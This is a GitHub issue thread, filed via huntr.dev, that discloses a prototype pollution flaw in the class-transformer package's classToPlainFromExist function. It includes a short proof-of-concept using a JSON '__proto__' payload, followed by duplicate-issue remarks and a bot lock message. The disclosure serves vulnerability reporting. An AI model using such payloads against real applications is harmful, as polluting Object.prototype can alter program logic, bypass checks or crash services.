huntr.dev - Prototype Pollution

[huntr-helper]

Vulnerability Description

Affected versions of this package are vulnerable to Prototype Pollution. the classToPlainFromExist function could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload.

Steps To Reproduce:

var root = require("class-transformer"); 
var payload = JSON.parse('{"__proto__": {"hjw": "jhu"}}'); 
root.classToPlainFromExist(payload,{}); 
console.log({}.hjw);

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

[saulotoledo]

Issue already reported at #339.

[JamieSlome]

Brilliant, I have seen you have also referenced the pull request as well in the issue! 🍰

[saulotoledo]

@jotamorais This issue may be closed in favor of #339.

[github-actions]

This issue has been automatically locked since there has not been any recent activity after it was closed. Please open a new issue for related bugs.